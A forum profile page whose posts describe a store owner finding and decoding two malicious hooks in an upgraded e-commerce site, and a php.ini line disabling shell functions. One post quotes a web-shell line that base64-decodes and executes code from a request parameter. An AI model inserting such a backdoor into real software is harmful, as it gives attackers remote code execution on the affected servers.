jbranscum

Member
  • Content count

    7
  • Joined

  • Last visited

Community Reputation

0 Neutral

About jbranscum

  1. One more reply for anyone that is looking to secure their php installation in the future; add the following to your php.ini file: disable_functions =exec, system, passthru, pcntl_exec, popen, proc_open, shell_exec;
  2. Thanks for pointing out that there would be an associated file; May 13 2016. Quite the coincidence that I'd happen to find the exploits exactly one year later. Unfortunately I don't have the apache logs from that time to review what was done. Thanks again for the help.
  3. Both hooks are identical; the first is a very simple decode that does a lot of file manipulation. The second one I don't have enough php wits to crack: $f = create_function('',base64_decode(strtr(str_replace(chr(10),'',$_REQUEST['c0d3']), '-_,', '+/='))); Something about replacing a newline but the rest doesn't make much sense in context.
  4. Hello all I recently made the switch from a modded v5 to 6.1.7 using these fantastic instructions from smither but I have a nagging sense that these two hooks I'm seeing may not be part of CC. To my knowledge, my previous v5 modded site was never compromised and the only people that had access to it were myself, my spouse and the third party that did the aforementioned modding. They were enabled after the update but I have since disabled them. Thoughts? By the way; v6 runs very well on nginx with a few tweaks. EDIT: Nevermind; I've answered my own question. I decoded the hooks and they're both decidedly nefarious; looks like the store was compromised or the third party left us "presents". No way of getting a time period on when they were added so its hard to know if they were present for two weeks or two years. There is a lot of file manipulation in the decoded script so I'm going to go with 'compromised site'.